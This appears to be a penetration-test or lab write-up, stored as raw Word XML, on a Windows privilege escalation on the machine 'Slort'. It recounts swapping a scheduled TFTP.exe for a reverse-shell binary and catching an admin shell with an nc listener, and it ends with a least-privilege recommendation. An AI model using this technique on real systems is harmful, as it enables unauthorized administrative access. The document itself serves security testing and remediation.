              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:lang w:val="en-CA" w:eastAsia="en-CA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc137283763" w:history="1">
            <w:r w:rsidRPr="0085561B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Steps to Reproduce</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc137283763 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65B38560" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
          <w:pPr>
            <w:jc w:val="both"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="3310AA2F" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="215D9801" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9D2A6B" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRPr="00782E20" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Privilege Escalation vulnerability through unsecure Scheduled task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E710C5D" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRPr="00782E20" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21F3F5D2" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272A4F4F" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRPr="00D44BC3" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The evaluated IP in the scope, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Slort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (192.168.225.53), has been identified to possess a notable security vulnerability related to scheduled tasks. This vulnerability, upon exploitation, facilitates the acquisition of administrative privileges, thereby granting unauthorized access to higher-level functionalities. Of significance is the observation that the executable file TFTP.exe is executing with administrative privileges to backup data every 5 minutes, despite being a low privileged user for the IP in scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D315142" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0807165D" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F1A8E8" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The impact of the vulnerability is severe, as it allows an attacker to manipulate the TFTP.exe file to gain a shell as an administrator as the executable is running with system privileges. With shell access and administrative privileges, the attacker can manipulate files, configurations, and system settings. These manipulations can lead to data breaches, corruption, unauthorized modification, and other detrimental effects. If the attacker successfully modifies the file, they could introduce a backdoor mechanism that provides them with a persistent point of access even after the initial exploit has been discovered and remediated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE98BD2" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29A5D254" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5982AE97" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0570BB0A" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>We recommend modifying the configuration of TFTP.exe to run with the least privilege necessary for its operation. Review the scheduled task configuration for TFTP.exe and make sure it is set up securely and that the user context is appropriate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C41C7D" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E85C78C" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6"/>
    <w:p w14:paraId="3D44FB0F" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6"/>
    <w:p w14:paraId="1A6046F1" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRPr="001C6774" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6"/>
    <w:p w14:paraId="7A8E52E1" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="410E7EF2" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="dotted" w:sz="4" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6428D178" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CF8D458"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rPr>
        <w:t>We started the enumeration process as a low privileged user “Rupert” as seen below in the right panel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F6EF16" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C3F04E5"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2E6E918" wp14:editId="3F88EA9A">
            <wp:extent cx="8229600" cy="3831590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2123053399" name="Picture 21230533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98208"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3831590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ABA03A" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B2EC582" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C5BF08D" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E2859D0" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D0A85DD" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37BE2828" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15175B34"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We browsed through the C directory and found a folder named Backup. We selected the folder in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>hope</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> of getting a system running “backup” file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C12971C"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29CE838" wp14:editId="588570C1">
            <wp:extent cx="6705600" cy="5743575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="11032405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40599" name="Picture 1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05600" cy="5743575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="303BD002"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The folder contains a text file named info.txt which gives the information that TFTP.exe runs every 5 minutes as seen below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A7B778"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2436FBD" wp14:editId="4022650D">
            <wp:extent cx="6581775" cy="5762625"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="2382657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701" name="Picture 1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81775" cy="5762625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3628CC"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As TFTP.exe is running backup process, there was a possibility of it been running with admin privileges. To gain a shell with admin privileges, we renamed TFTP.exe to TFTP1.exe and the malicious reverse.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="00C34EDA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(uploaded during initial access)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as TFTP.exe. Since TFTP.exe is supposed to run every 5 minutes, we should be able to gain a shell after the scheduled backup kicks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC7E86A" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="522BE25E"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28B70D4" wp14:editId="3A7424F8">
            <wp:extent cx="6610350" cy="4019550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="121486576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5764"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10350" cy="4019550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="789806A6" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B44165F" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E1B3551" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74D95989" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="514CD960" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C3C146A" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77E7E67E" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="168274A0" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRPr="0023755D"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We started a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0023755D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>listener on port 4443, after waiting for a bit, the scheduled backup ran, and we were able to gain a shell with admin rights as highlighted below on the right terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C0D38D" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71808F41"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4BB2187" wp14:editId="6A0203F1">
            <wp:extent cx="8229600" cy="3860165"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="32394770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7703"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229600" cy="3860165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0491F1" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="065FC8F5" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23AD22F7" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44232DE7" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14A4DE66" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13F49C9D" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A28F74C" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00A3E44C" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A79E83D" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21CF4195"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The flag for the machine is highlighted below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2713B2CE" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39BF5779" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6"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A5E34D3" wp14:editId="3B1D81A8">
            <wp:extent cx="6524625" cy="3971925"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="48768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48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24625" cy="3971925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8B9BDA" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="235D50BF" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="005D4EB6">
      <w:headerReference w:type="default" r:id="rId25"/>
      <w:footerReference w:type="default" r:id="rId2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0B01E" w14:textId="77777777" w:rsidR="00424133" w:rsidRDefault="00424133" w:rsidP="003C1D22">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
